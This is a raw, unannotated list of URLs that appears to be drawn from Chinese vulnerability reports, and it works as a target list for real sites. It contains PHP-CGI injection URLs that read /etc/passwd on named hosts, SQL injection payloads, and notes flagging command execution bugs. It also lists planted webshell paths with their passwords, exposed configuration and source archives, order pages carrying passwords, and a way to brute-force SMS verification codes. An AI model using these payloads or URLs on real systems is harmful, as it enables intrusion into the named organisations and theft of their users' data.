http://**.**.**.**/order/order_show.jsp?order_id=3418664&password=341866429820 http://**.**.**.**/order/order_show.jsp?order_id=3418720&password=341872048493 http://**.**.**.**/order/order_show.jsp?order_id=3418738&password=341873887035 http://**.**.**.**/order/order_show.jsp?cust_id=209706&order_id=3418754&password=341875442491&user=32960 http://**.**.**.**/order/order_show.jsp?order_id=3418804&password=341880454161 http://**.**.**.**/order/order_show.jsp?order_id=3418837&password=341883788251 http://**.**.**.**/order/order_show.jsp?order_id=3418852&password=341885291263 www.gyga.gov.cn/cms4jadmin/login.jsp_ http://b2b.haier.com/phpmyadmin/ http://2000235102.flzhan.com/index.html http://acts.zhan.qq.com/module/map/index?mapsId=mapsId_558a709967e26&data=eyJpZCI6Im1hcHNJZF81NThhNzA5OTY3ZTI2Iiwid2lkdGgiOjMyMCwiaGVpZ2h0IjoyMDAsImRhdGEiOnsibGlzdCI6W3siYWRkcmVzcyI6ImNzc3huIiwibGF0IjoiMzkuOTA0MDMiLCJsbmciOiIxMTYuNDA3NTI2IiwiaXNGaW5kVXJsIjoiIiwiaXNEaXJlY3Rpb24iOiIifV0sInpvb20iOiIxMSJ9fQ== www.elife.com域名,希望这个没有重置。 http://passport.elife.com/cas/n/findPwd http://wooyun.org/bugs/wooyun-2010-0111591 http://www.h-h.com.cn/visa/view_visa.aspx?id=74 user:haihua_pek http://web.hangzhou.com.cn/lvyou/admin.php http://www.lfjys.net/ http://www.lfjys.net/ks_name.asp?url=1.asp&ks_id=712&lb=%CB%E6%CC%C3%BF%BC%CA%D4&xx_id=61 http://oa.yccas.com/ http://www.hbsgjj.cn/console/login/LoginForm.jsp http://**.**.**.**/ShowFiles/EquWxList.aspx http://**.**.**.**/syjx/share/ShowFiles/EquWxList.aspx http://**.**.**.**/nxdyq/ShowFiles/EquWxList.aspx http://**.**.**.**/ShowFiles/EquWxList.aspx http://tjbb.zjwst.gov.cn:8080/irpt/i/oem/wsb/login.jsp http://218.85.72.90:8080/irpt/i/oem/wsb/login.jsp http://116.228.189.201:8080/irpt/i/oem/wsb/login.jsp http://www.sdwstj.org/webPage/i/oem/wsb/login.jsp http://222.247.54.151:8080/irpt/i/oem/wsb/index.jsp http://proposal.guohualife.com:8090/ http://proposal.guohualife.com:8091/proposalproxy/api/proposal/system/systemwebservice?wsdl 
http://www.dahebao.cn/clue/append http://hukao.91huayi.com/news/MoreList.aspx?typeId=1f2169f8-16ea-4570-91ce-9cfc00ecb22f http://**.**.**.**//MessageBoard/MessageView.aspx?MesId=9 http://**.**.**.**/MessageBoard/MessageView.aspx?MesId=1 http://**.**.**.**/MessageBoard/MessageView.aspx?MesId=1 http://**.**.**.**/MessageBoard/MessageView.aspx?MesId=7 http://**.**.**.**//MessageBoard/MessageView.aspx?MesId=29 http://reportplan.ccgp.gov.cn/问题在这个网站 http://reportplan.ccgp.gov.cn/myname/css.jsp http://oa.sohuu.com:81/ http://www.bestv.com.cn//phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=d3aeCVNVBFEHBlEEBVxVCgdUAQNeVwIND1EDAAcWDVYOBAAKW10SEURpAEFBDG9TA0sNLVATCAoBdTthCzkKR0FGC0MKDUwpA3IwQEZTRUIie0g http://10.50.127.77/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=d3aeCVNVBFEHBlEEBVxVCgdUAQNeVwIND1EDAAcWDVYOBAAKW10SEURpAEFBDG9TA0sNLVATCAoBdTthCzkKR0FGC0MKDUwpA3IwQEZTRUIie0g http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**:8001/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**/workplate/login.aspx http://**.**.**.**:8001/workplate/login.aspx site:myj.com.cn inurl:order http://115.29.188.150:9002/superadmin/adminLogin.action存在命令执行漏洞 http://122.141.234.168:7001/jhgx/login2.jsp http://www.sdjks.cn/content.php?id=[sql http://www.sdjks.cn/content.php?id=1382/*!and*/1=2/*!union*//*!select*/%20null,null,null,null,null,null,schema_name,null,null,null%20from%20information_schema.schemata%20limit%208,8&sorttab=3 http://**.**.**/superadmin/adminLogin.actionisAgent=null&agentUser=null inurl:http://www.gdapp1.e-chinalife.com/upload/pdf/ url:http://www.chaojibiaoge.com/index.php/Oa/Project/viewContent/id/2499/sharekey/70i47z7f 
url:http://www.chaojibiaoge.com/index.php/Oa/Project/viewContent/id/2499/sharekey/70i47z7f http://www.ayibang.com/index/login?_m http://mall.tjpme.com/fg/user/userreg.do?actionType=regsetp1 http://mall.tjpme.com/userfiles/product/img/20150505/headimg/1430819891792.jsp jdbc:oracle:thin:@10.101.0.54:1521 http://yd.iflytek.com/Address/AddressEdit/577 http://yd.iflytek.com/Bill/BillEdit/279 http://o2odemo.fanwe.net/ https://github.com/tianbaoyang/map/blob/f69a75b8ebcf7810a840d74477d662ea1bac8d4a/src/cn/edu/fudan/mail/Mail.java https://github.com/LoserKe/AccountManageSystem/blob/1019a41412d78566220b64dd5f9b71aca1013557/src/main/java/com/softwareengineering/accountmanager/controller/LogupController.java https://github.com/VELVETDETH/VELVET-PROGRAMMING/blob/9515b5524d05adb2eb9dabe31f99955d95def2d2/Python/query_grade.py http://101.231.33.241 http://101.231.35.97 http://101.231.38.33 http://101.231.38.57 http://101.231.38.118 http://101.231.38.145 https://101.231.38.153 http://101.231.38.241 http://101.231.39.38 http://101.231.39.185 http://101.231.39.193 http://101.231.40.62 http://101.231.40.241 http://101.231.41.57 http://101.231.41.121 http://101.231.41.225 http://101.231.43.17 http://101.231.43.105 http://101.231.45.57 http://101.231.45.82 http://101.231.45.225 http://101.231.46.18 http://101.231.46.25 https://101.231.46.73 http://101.231.46.209 http://101.231.47.9 http://101.231.47.62 http://101.231.47.193 http://101.231.47.241 http://101.231.48.49 http://101.231.48.185 http://101.231.48.242 http://101.231.50.129 http://101.231.50.209 http://101.231.50.241 http://101.231.51.25 http://101.231.51.49 http://101.231.51.65 http://101.231.51.113 http://101.231.52.49 http://101.231.52.57 http://101.231.52.89 http://101.231.52.98 http://101.231.52.129 http://101.231.52.137 http://101.231.52.246 http://101.231.53.1 http://101.231.53.121 http://101.231.53.153 http://101.231.53.177 http://101.231.54.1 http://101.231.54.9 http://101.231.54.185 http://101.231.54.241 
http://101.231.55.49 http://101.231.55.94 http://101.231.55.137 http://101.231.55.241 http://101.231.56.57 http://101.231.57.25 http://bbs.49you.com/uc_server/admin.php?m=user&a=login&iframe=&sid= http://www.zuk.com/ https://passport.lenovo.com/wauthen3/wauth/jsp/resetPasswordNew.jsp?lenovoid.action=null&lenovoid.realm=null&lenovoid.ctx=null&lenovoid.lang=null&lenovoid.uinfo=null&lenovoid.cb=null&lenovoid.vp=null&lenovoid.display=null&lenovoid_idp=null&lenovoid.source=null&lang=null&username=********@qq.com&verifyCode=293294 https://passport.lenovo.com/wauthen3/wauth/jsp/resetPasswordNew.jsp?lenovoid.action=null&lenovoid.realm=null&lenovoid.ctx=null&lenovoid.lang=null&lenovoid.uinfo=null&lenovoid.cb=null&lenovoid.vp=null&lenovoid.display=null&lenovoid_idp=null&lenovoid.source=null&lang=null&username=********@qq.com&verifyCode=293294 http://bbs.zuk.cn/space.php?uid=416 url:http://www.daimayi.com/index.php/Loan/index/s/1/money/1/deadline/1/lt/1/co_id/1 http://a.xcar.com.cn/?zoneclick=102090 http://gznss.capital-online.com.cn http://gznss.capital-online.com.cn/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://202.205.109.105/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://118.194.166.172/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://118.194.166.175/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://211.150.124.83/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://210.32.223.254/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://112.14.182.120/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://ns2.jyb.com.cn/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://211.151.94.131/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://ns.mas.gov.cn/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://115.238.165.99/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://202.205.11.70/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://202.205.109.104/index.php?-dauto_prepend_file%3d/etc/passwd+-n 
http://115.238.165.99/index.php?-dauto_prepend_file%3d/etc/passwd+-n http://202.107.209.151/index.php?-dauto_prepend_file%3d/etc/passwd+-n https://github.com/cosmoschen/nlpi-activity/blob/8e9c9582413b554abbb74bed4599283b6338f1bf/grails-app/conf/Config.groovy http://www.db56.net/client/pro/article/company_supplydemand_detail.php?id=70&company_id=58 http://baoji.jiwu.com/ http://baoji.jiwu.com/lostPass!lostpassword.action http://**.**.**.**:9999/poweb/showpage.do?status=show&METAID=148196 http://**.**.**.**:8080/poweb/showpage.do?status=show&METAID=68366 http://**.**.**.**:9091/poweb/showpage.do?status=show&METAID=6005 http://**.**.**.**:8000/poweb/showpage.do?status=show&METAID=29574 http://**.**.**.**:8080/poweb/showpage.do?status=show&METAID=30260 http://down.qibosoft.com/down.php?v=fenlei1.0 http://211.151.111.164/manager/html/ http://211.151.111.164/job/ http://211.151.115.164/job/ http://support.xirang.com/support.zip http://218.6.160.231/new/web/web/web/indexmore.asp?leibie=%D0%C2%CE%C5%B1%A8%B5%C0 http://211.151.3.41/job http://211.151.3.42/job http://211.151.3.49/job http://211.151.3.48/job http://211.151.3.69/job http://211.151.3.66/job http://211.151.3.20/job http://211.151.3.19/job http://www.anxin.com/news/?t=1432722338861 http://www.cdb.com.cn www.cdb.com.cn http://www.beiwo.com/.svn/entries http://www.beiwo.com/uc_server/data/config.inc.php www.91zjd.com/recharge/yeepay_recharge.asp http://www.2345.com却不会引发任何告警。 http://www.ppwan.com/Public/check/op/email?0.49405437987297773&clientid=email&email=sample%40email.tst http://123.138.37.156:8090/hljhcms/xt/login.action存在命令执行漏洞 http://123.138.37.156:8090/hljhcms/xt/1.jsp密码123 http://123.138.37.156:8090/hljhcms/2.jsp密码tom http://www.cits.cn/member/bind.html www.cits.cn http://www.cits.cn http://cds.zt-express.com/Area/GetCity?parentId=340000 http://cds.zt-express.com/Area/GetDistrict?parentId=340800 http://cds.zt-express.com/System/main.aspx http://cds.zt-express.com/PageViews/Hall/ApplyList.aspx 
http://**.**.**/ http://**.**.**.**/order/order_travel.jsp?info_id=7087274 http://**.**.**.**/order/order_travel.jsp?info_id=7275941 http://**.**.**.**/order/order_travel.jsp?info_id=7127739 http://**.**.**.**/order/order_travel.jsp?info_id=7405780 http://**.**.**.**/order/order_travel.jsp?info_id=7443382 http://**.**.**.**/order_travel.jsp?info_id=7412609 http://**.**.**.**/order/order_travel.jsp?info_id=5966371 http://**.**.**.**/order/order_travel.jsp?info_id=7134981 http://**.**.**.**/order/order_travel.jsp?info_id=7388741 http://**.**.**.**/order/order_travel.jsp?info_id=7397742 http://**.**.**.**/order/order_travel.jsp?info_id=7531163 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/home_ajax.jsp?action=goods&info_id=7053658&cust_id=127977 http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp http://**.**.**.**/ajax/order_ajax.jsp 
http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 
http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://m.handu.com(124.128.76.36)。因为手机验证时验证码为4位,且m.handu.com不像主站一样对验证码次数做限制,导致可通过遍历0000-9999验证码方式注册任意账号。 http://m.handu.com:80/user.php?act=ajax_region_list®ion_id=1 site:189.cn inurl:order http://m.gd.189.cn/telExchange/orderExchangeView.action?orderExchangeId=H109967511291 http://**.**.**.**/workplate/base/org/WebUserList.aspx?id=99 http://**.**.**.**/workplate/base/org/WebUserList.aspx?id=99 http://**.**.**.**/workplate/base/org/WebUserList.aspx?id=99 http://**.**.**.**/workplate/base/org/WebUserList.aspx?id=99 http://**.**.**.**/workplate/base/org/WebUserList.aspx?id=99 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/sxlist.aspx?baseorg=214 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/sxlist.aspx?baseorg=214 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/sxlist.aspx?baseorg=214 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/sxlist.aspx?baseorg=214 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/sxlist.aspx?baseorg=214 http://**.**.**.**/workplate/xzsp/kqgl/tjfx/listBcmx2.aspx?org=159 http://**.**.**.**/workplate/xzsp/kqgl/tjfx/listBcmx2.aspx?org=159 http://**.**.**.**/workplate/xzsp/kqgl/tjfx/listBcmx2.aspx?org=159 http://**.**.**.**/workplate/xzsp/kqgl/tjfx/listBcmx2.aspx?org=159 http://**.**.**.**/workplate/xzsp/kqgl/tjfx/listBcmx2.aspx?org=159 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/dtl.aspx?id=47068 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/dtl.aspx?id=47068 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/dtl.aspx?id=47068 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/dtl.aspx?id=47068 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/dtl.aspx?id=47068 
http://**.**.**.**/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=382 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=382 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=382 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=382 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=382 http://**.**.**.**/workplate/comm/noti/mobilemsgsend.aspx http://**.**.**.**/workplate/comm/noti/mobilemsgsend.aspx http://**.**.**.**/workplate/comm/noti/mobilemsgsend.aspx http://**.**.**.**/workplate/comm/noti/mobilemsgsend.aspx http://**.**.**.**/workplate/comm/noti/mobilemsgsend.aspx http://**.**.**.**/workplate/xzsp/tjfx/ckmx/ckmxlist.aspx http://**.**.**.**//workplate/xzsp/tjfx/ckmx/ckmxlist.aspx http://**.**.**.**//workplate/xzsp/tjfx/ckmx/ckmxlist.aspx http://**.**.**.**//workplate/xzsp/tjfx/ckmx/ckmxlist.aspx http://**.**.**.**//workplate/xzsp/tjfx/ckmx/ckmxlist.aspx http://www.newman.mobi/ http://oa.chinawanda.com:1010/login.php http://oa.chinawanda.com:1010/index.php http://oa.gszs.cn/ http://kygl.jhun.edu.cn/ky/vsMan.do?method=detailMan&manCode=11104091 http://kygl.jhun.edu.cn/ky/vsMan.do?method=detailMan&manCode= http://www.100.cn/ http://www.100.cn/user/resetpwd-index.html http://www.xmitic.com/reserve.aspx?id=41 http://www.xmitic.com/info.aspx?id=10030001000101010002 http://www.xmitic.com/manage/main.aspx http://218.5.98.136:8080/new/info/InfoChange.asp?InfoSort_PK=100001003 http://218.5.98.136:8080/new/info/InfoChange.asp?InfoSort_PK=100001002 http://www.xmitic.com/web.zip http://www.bangcle.com/login/ http://117.34.110.103:8090/dxszz/regUser.action存在命令执行漏洞 http://taste.tv189.com http://v.tv189.com/ http://so.tv189.com/ http://ifengvip.tv189.com/ http://hi.tv189.com/ http://my.tv189.com/ http://yx.tv189.com/ http://www.iskyworth.com/Admin/login.aspx http://v.17173.com:80/actapi/vinfo/getVinfo?orderby=3&type=web&pnum=5&videotype=1__&callback=jQuery110207761335416783393_1435040010287&_=1435040010289&acid=9 
http://yt.linekong.com:80/ http://219.143.219.77/console/login/LoginForm.jsp http://218.93.241.6/sqth/login.action http://**.**.**/ggcs/login.action http://www.dyshxx.com:235/dylgy/login.aspx http://www.joy.cn/ www.joy.cn http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.aoledior.com/admin.php URL:http://www.aoledior.com//feedback/post.php http://**.**.**.**/sqscms/show/protal_showMoreNotices.do?type_id=203&portal=1 http://**.**.**.**/syxcms/show/protal_showMoreNotices.do?type_id=3&portal=1 http://**.**.**.**/shcms/show/protal_showMoreNotices.do?type_id=201&portal=1 http://**.**.**.**/jslyqtkfq/show/protal_showMoreNotices.do?type_id=13 http://**.**.**.**/jslyqtrg/show/protal_showMoreNotices.do?type_id=0033 http://**.**.**.**/sqscms/show/protal_showNoticeById.do?n_id=4ae6ee4b4dace093014e283f100f2a15 http://**.**.**.**/syxcms/show/protal_showNoticeById.do?n_id=4028818a4df4abef014df698a8ad0082 http://**.**.**.**/shcms/show/protal_showNoticeById.do?n_id=2c90b2e44dff5bb4014e0a903a0500e1 http://**.**.**.**/jslyqtkfq/show/protal_showNoticeById.do?n_id=2c9481bc4d92fb30014dff5052b70027 http://**.**.**.**/jslyqtrg/show/protal_showNoticeById.do?n_id=8a80c66032205cb601327433654200ff http://admin.ikanshu.cn http://admin.ikanshu.cn/WEB-INF/web.xml http://admin.ikanshu.cn/WEB-INF/classes/config.properties img.chineseall.net/UserFiles/pic/ http://img.chineseall.net/UserFiles/pic/ img.chineseall.net/UserFiles/brand/ http://img.chineseall.net/UserFiles/brand/ img.chineseall.net/UserFiles/product/ http://img.chineseall.net/UserFiles/product/ img.chineseall.net/UserFiles/product/ http://img.chineseall.net/UserFiles/product/ http://www.91job.gov.cn/manage/OCL/view_s.aspx?personid=65434970 http://www.91job.gov.cn/manage/OCL/view_s.aspx?personid=65434971 http://www.gtyjzy.com/ 
http://www.gtyjzy.com/e/install/index.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExODcwMDU5OTgPZBYCAgEPZBYCAgMPFgIeB1Zpc2libGVoZGQ%3D&ctl02=%E8%BF%90%E8%A1%8CSQL http://www.gtyjzy.com/e/master/index.aspx http://cart.vip.com/te2/cart.php?callback=callback&isGetLast=1 http://checkout.vip.com/app/getUnpayOrder.php?callback=callback http://www.boway.com/cn/Service/index/p/1.html?cateid=324 http://www.boway.com/Service/station.html?province=&cateid=214 http://www.boway.com/Service/station.html?cateid=214 https://app.jiwu.com:3443/hui_app/jiwuhui_qiang.apk http://119.254.70.121/ http://119.254.70.121/admin/upload/video/video_More.jsp,可以进行上传课程,不过没有对上传文件进行验证,导致任意文件上传,不过直接传到内网服务器了,无法shell,不过如果内部人员就完全可以进行操作了,所以还是有一定风险的 http://www.ymatou.com/reset?option=forget http://bbs.chuwi.com/bbs.chuwi.com.zip http://wooyun.org/bugs/wooyun-2010-0120638 http://www.deovo.com/Attac/AttList.aspx?tid=100000025399735 http://www.huatu.com/biaoqian/bqlist.php?id=4598&bqzkxx=676 http://www.huatu.com/test.php http://159.226.126.50/SpecialTalentsInfo.Asp http://159.226.126.50/wipmhrfile http://159.226.126.50/wipmhrpic/ http://**.**.**.**/common/activeX/activeX.php http://wenjing.ytu.edu.cn/shownews.php?id=7519%27%20and%201=1%20and%20%271%27=%271 http://wenjing.ytu.edu.cn/shownews.php?id=7519%27%20and%201=2%20and%20%271%27=%271 http://kszx.xaau.edu.cn/news.php?id=13 http://sqlmap.org intitle:Login http://hanwang.com.cn/login.php http://mail.tofine.com:8090/login.php http://mail.tofine.com:8090/sys/login.php http://mail.kddl.cn:8090/sys/login.php http://mail.cqdc.com:8090/sys/login.php http://pop3.huaxia.com:8090/sys/login.php http://mail.nxcqcz.com:8090//sys/login.php http://mail.kmgfsj.cn:8090/login.php http://mail.nxcqcz.com:8090/login.php http://mail.timeloit.com:8090/login.php http://mail.dx-job.com:8090/sys/login.php http://kids.chineseall.cn http://kids.chineseall.cn/index.php/index/search?book_key=%27or%271%27%3D%271 
http://kids.chineseall.cn/index.php/index/search?book_key=%27or%271%27%3D%271 http://www.tthaodian.com/index.action http://**.**.**.**/doc/ http://**.**.**.**/doc http://**.**.**.**/doc http://**.**.**.**/doc/ http://hi.haidilao.com/exchanges/inMobileEx.action?customerId=0100000059101316 http://itjuzi.com/tag?id=166&prov=北京&status=1 http://itjuzi.com/company/foreign?prov=北京&stage=3&status=2 http://itjuzi.com/investevents?scope=126&similar_money=1&sub_scope=131 http://itjuzi.com/location?born_year=2014&fund_status=15&id=国外&type=com http://itjuzi.com/merger?date=2013&location=in&scope=70 http://weboa.gto365.com/ http://weboa.gto365.com/e3oa/main.asp,可以查看总部文件、每日必读、总部公共、总部动态等信息,如: http://58.222.195.110:8081/jyweb/powerpunish/powerpunish_condition_reg_page.aspx http://221.230.140.252/tzptweb//powerpunish/powerpunish_condition_reg_page.aspx http://58.222.211.21/xhweb//powerpunish/powerpunish_condition_reg_page.aspx http://qlgk.taizhou.gov.cn/tzptweb//powerpunish/powerpunish_condition_reg_page.aspx http://58.222.216.220/ggweb//powerpunish/powerpunish_condition_reg_page.aspx http://58.222.195.110:8081/jyweb/powerpunish/powerpunish_sort_reg_page.aspx http://221.230.140.252/tzptweb/powerpunish/powerpunish_sort_reg_page.aspx http://58.222.211.21/xhweb/powerpunish/powerpunish_sort_reg_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/powerpunish/powerpunish_sort_reg_page.aspx http://58.222.216.220/ggweb/powerpunish/powerpunish_sort_reg_page.aspx http://58.222.195.110:8081/jyweb/powerpunish/powerpunish_type_reg_page.aspx http://221.230.140.252/tzptweb/powerpunish/powerpunish_type_reg_page.aspx http://58.222.211.21/xhweb/powerpunish/powerpunish_type_reg_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/powerpunish/powerpunish_type_reg_page.aspx http://58.222.216.220/ggweb/powerpunish/powerpunish_type_reg_page.aspx https://yn.ac.10086.cn/login/ http://banner.chinesegamer.net/gamebn/abmw.aspx?z=105&isframe=true http://my.cnki.net/cnkirec/unionpay/unionpaypay.aspx http://m.49you.com/ 
http://119.254.70.76/ http://119.254.70.76/job.php http://119.254.70.76/cache http://119.254.70.76/upload1 http://119.254.70.76/config/ http://119.254.70.76/include/ http://119.254.70.76/api http://119.254.70.76/static http://119.254.70.76/page http://119.254.70.76/payment http://119.254.70.76/upload1/中可以下载合同,里面部分含有租客信息 http://www.51zxw.net/help/help_rs.asp http://www.job088.com/jobsearch.php?areaid=*&edu=&exp=&job1=&job1_son=&keyword=&salary=&sex=&tid=611&type= http://kaipiaoba.homelink.com.cn/ri/system/logout.action http://admin.show3.soufun.com http://www.baixingbao518.com/Site/page/id/22.html http://www.baixingbao518.com/Site/page/id/22*.html http://api.49you.com/User/Login/doLogin?rnd=*&username=zhangjianwei&password=123456&save_id=undefined&returl=<ype=&adv_id=0&format=json&jsoncallback=* http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://hdapp.hangzhou.com.cn/zhonghai/admin/index.php http://hdapp.hangzhou.com.cn/dashijie/admin/ http://hdapp.hangzhou.com.cn/jgpd/admin/ http://hdapp.hangzhou.com.cn/zhonghai/admin/ 
http://hdapp.hangzhou.com.cn/huodong2014/admin/ http://kd.gdmmyd.net/ www.cqcjda.com/urbanregonline/admin/applyinfo.aspx地址 inurl:ctvc.tv http://crm.ctvc.tv/general/ERP/LOGIN/logincheck.php http://crm.ctvc.tv/general/ERP/LOGIN/logincheck.php http://crm.ctvc.tv/general/ERP/LOGIN/logincheck.php http://wooyun.org/bugs/wooyun-2015-0107474 http://www.mse.fudan.edu.cn/ https://github.com/akiroz/wheelOfFortune/blob/72efc425cad3f35b7e9b7123e54cbad21069852e/src/main/java/Web.java https://github.com/CompanyAkuPunya/SPICT/blob/a9b9f807d5bdd95d954f4d53e4c9ac14d6f4acd3/spict.sql http://show.test.yoho.cn/admin/default/yoho http://i.49you.com/news/item/catid/55/id/15.html http://vae.haidilao.com:8680/ecitySSO/sso/beforeLogin.action http://www.haidilao.com/sg/index.php?m=comment&c=index&a=init&commentid=content_24-1-1&iframe=1&page=7079 http://wooyun.org/bugs/wooyun-2015-0116140 http://hi.haidilao.com/exchanges/inMobileEx.action?customerId=0100000059101391 http://api.49you.com//User/Login/doLogin http://www.xieche.com.cn/mobilecar-mycarservice_detail-pa_id--order_id-20000 http://www.gocha.cn/mobile/user.php?act=order_detail&order_id=5300 cn:8183 http://zb.suning.com/bid-web/supRegisterInitForPw.htm http://119.6.92.76:8080/axis2/axis2-admin/ http://uc.oppomobile.com/usercenter/bindMobile.do http://uc.oppomobile.com/usercenter/bindMobile.do http://www.fjbs.gov.cn/AppFile.action?fn=upload www.fjbs.gov.cn http://xsp.95306.cn/ http://xsp.95306.cn/payto.asp?orderlist=2015626181159 http://xsp.95306.cn/order_main.asp?id=2015626172159 http://www.baixingbao518.com/Logo/forgotpass.html http://**.**.**/qtfr/login/login.jsp 